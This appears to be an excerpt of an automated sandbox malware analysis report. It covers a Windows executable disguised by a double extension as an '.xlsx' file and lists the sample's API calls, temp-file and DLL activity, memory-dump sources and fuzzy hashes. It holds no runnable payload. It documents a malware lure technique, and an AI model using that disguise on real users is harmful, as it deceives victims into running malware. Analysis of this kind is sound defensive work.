                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-1857211195
                                                                            • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                            • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                            • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                            • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403192
                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                            • WriteFile.KERNELBASE(0040BE90,00411737,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                            • SetFilePointer.KERNELBASE(00004DC4,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$CountTickWrite
                                                                            • String ID:
                                                                            • API String ID: 2146148272-0
                                                                            • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                            • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                            • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                            • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                                            APIs
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                              • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 4115351271-3512041753
                                                                            • Opcode ID: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                                            • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                                            • Opcode Fuzzy Hash: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
                                                                            • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                            • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                            • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                            • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                            • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                            • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                            • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                            • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                            • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                            • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                            • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                            • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                            • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                            • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                            • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                            • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                            • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                            • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                            • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                            • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                            • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                            • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                            • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerWrite
                                                                            • String ID:
                                                                            • API String ID: 539440098-0
                                                                            • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                            • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                                            • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                            • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                            • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                                            • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                            • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: EnumErrorLastWindows
                                                                            • String ID:
                                                                            • API String ID: 14984897-0
                                                                            • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                            • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                            • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                            • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                            APIs
                                                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                                            • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                                            • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                                            • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
